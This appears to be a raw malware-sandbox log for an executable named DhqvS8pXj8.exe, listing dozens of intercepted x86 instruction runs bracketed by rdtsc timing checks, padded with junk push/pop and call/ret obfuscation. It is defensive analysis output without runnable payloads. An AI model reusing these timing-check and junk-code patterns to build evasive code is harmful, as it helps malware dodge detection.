Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DED7B second address: 4DED7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DEE05 second address: 4DEE0F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DEE0F second address: 4DEE14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DEE14 second address: 4DEE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c mov esi, ecx 0x0000000e nop 0x0000000f jmp 00007F5BC10A3604h 0x00000014 push eax 0x00000015 ja 00007F5BC10A3602h 0x0000001b jne 00007F5BC10A35FCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DF21E second address: 4DF224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DF224 second address: 4DF229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DF841 second address: 4DF845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DF845 second address: 4DF8A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5BC10A35F8h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F5BC10A3601h 0x00000015 nop 0x00000016 add di, D572h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F5BC10A35F8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D19EAh], ecx 0x0000003d push 00000000h 0x0000003f or di, 4F1Eh 0x00000044 push eax 0x00000045 push ebx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E0280 second address: 4E0286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E0286 second address: 4E028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E13DB second address: 4E13DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E344D second address: 4E3451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E3245 second address: 4E324B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E3451 second address: 4E346A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F5BC10A35FCh 0x0000000c popad 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E324B second address: 4E3250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E346A second address: 4E34ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3603h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b call 00007F5BC10A3601h 0x00000010 mov dword ptr [ebp+122D1BF1h], esi 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 clc 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F5BC10A35F8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 add dword ptr [ebp+12482E29h], eax 0x0000003c pushad 0x0000003d movzx eax, si 0x00000040 push ecx 0x00000041 xor eax, 3A6EABC3h 0x00000047 pop edi 0x00000048 popad 0x00000049 xchg eax, ebx 0x0000004a jmp 00007F5BC10A35FAh 0x0000004f push eax 0x00000050 jbe 00007F5BC10A3600h 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E3FD2 second address: 4E3FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E8EF4 second address: 4E8EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E94F3 second address: 4E950C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F5BC10B7098h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F5BC10B709Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E950C second address: 4E9510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E522E second address: 4E5232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EA7AB second address: 4EA7D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BC10A3607h 0x00000008 jmp 00007F5BC10A3601h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F5BC10A35F8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EA7D1 second address: 4EA83D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BC10B7098h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov di, bx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jp 00007F5BC10B7096h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jmp 00007F5BC10B709Eh 0x00000027 mov eax, dword ptr [ebp+122D1721h] 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F5BC10B7098h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 add dword ptr [ebp+1247BFE9h], edx 0x0000004d push FFFFFFFFh 0x0000004f sub bx, 5077h 0x00000054 nop 0x00000055 jnl 00007F5BC10B70A4h 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EA83D second address: 4EA843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EB945 second address: 4EB94A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EA843 second address: 4EA84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EC918 second address: 4EC91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4ED760 second address: 4ED765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4ED765 second address: 4ED7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F5BC10B7096h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push ebx 0x00000012 mov dword ptr [ebp+12452B7Ah], edi 0x00000018 pop edi 0x00000019 mov dword ptr [ebp+122D19AAh], eax 0x0000001f push 00000000h 0x00000021 or dword ptr [ebp+1245E0D7h], edx 0x00000027 push 00000000h 0x00000029 mov edi, 64DA5EC1h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 pushad 0x00000035 jns 00007F5BC10B7096h 0x0000003b push eax 0x0000003c pop eax 0x0000003d popad 0x0000003e popad 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007F5BC10B7096h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4ED95B second address: 4ED968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F5BC10A35F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F0734 second address: 4F073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F073E second address: 4F0762 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F5BC10A3605h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F3710 second address: 4F3715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F0822 second address: 4F0826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F3715 second address: 4F37B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007F5BC10B70A9h 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D1A84h], edx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F5BC10B7098h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1BECh], edx 0x00000039 mov bx, dx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebp 0x00000041 call 00007F5BC10B7098h 0x00000046 pop ebp 0x00000047 mov dword ptr [esp+04h], ebp 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc ebp 0x00000054 push ebp 0x00000055 ret 0x00000056 pop ebp 0x00000057 ret 0x00000058 movzx edi, dx 0x0000005b mov bl, 7Ch 0x0000005d xchg eax, esi 0x0000005e jmp 00007F5BC10B709Fh 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push ecx 0x00000069 pop ecx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F0826 second address: 4F082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F37B8 second address: 4F37BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F280B second address: 4F2813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F5A7B second address: 4F5A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F7806 second address: 4F781A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10A35FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F5A7F second address: 4F5A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F781A second address: 4F7835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F5BC10A3601h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F86E5 second address: 4F86F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5BC10B7096h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F86F0 second address: 4F8706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5BC10A35FCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4954F1 second address: 495509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Eh 0x00000009 ja 00007F5BC10B7096h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50106A second address: 501076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5BC10A35F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 501076 second address: 50107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50107D second address: 5010A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5BC10A35FAh 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 je 00007F5BC10A35F6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edi 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 501398 second address: 50139C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 505BB2 second address: 505BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 505BB8 second address: 505BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 505BBC second address: 505BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 505C63 second address: 505C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 505CAE second address: 505CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A1EA second address: 50A1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A8E7 second address: 50A905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F5BC10A3607h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50ACD3 second address: 50ACD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50ACD7 second address: 50AD12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BC10A3608h 0x0000000b push eax 0x0000000c pushad 0x0000000d jo 00007F5BC10A35F6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F5BC10A35FCh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50AD12 second address: 50AD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50AEB5 second address: 50AEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B035 second address: 50B05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F5BC10B70A4h 0x0000000c pushad 0x0000000d jns 00007F5BC10B7096h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B05D second address: 50B065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B065 second address: 50B06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B1A8 second address: 50B1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B1AC second address: 50B1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B317 second address: 50B334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5BC10A3602h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50FAB4 second address: 50FAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50FAB8 second address: 50FABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50FABE second address: 50FAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50FAC4 second address: 50FACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50FACC second address: 50FAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A1111 second address: 4A114D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F5BC10A3646h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5BC10A3604h 0x00000017 jmp 00007F5BC10A3606h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A114D second address: 4A1161 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5BC10B7096h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F5BC10B7096h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A1161 second address: 4A116B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BC10A35F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E737F second address: 4E7383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E7383 second address: 4E738C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E738C second address: 4E73D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 adc edi, 53C36F93h 0x0000000f lea eax, dword ptr [ebp+1248C0BAh] 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F5BC10B7098h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f cld 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 js 00007F5BC10B7098h 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E7893 second address: 4E7899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E7A90 second address: 4E7AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 ja 00007F5BC10B7096h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jns 00007F5BC10B7096h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E7AAB second address: 4E7B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007F5BC10A3604h 0x00000014 jmp 00007F5BC10A3605h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push ecx 0x0000001d jmp 00007F5BC10A35FBh 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F5BC10A3608h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E83B3 second address: 4E83BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
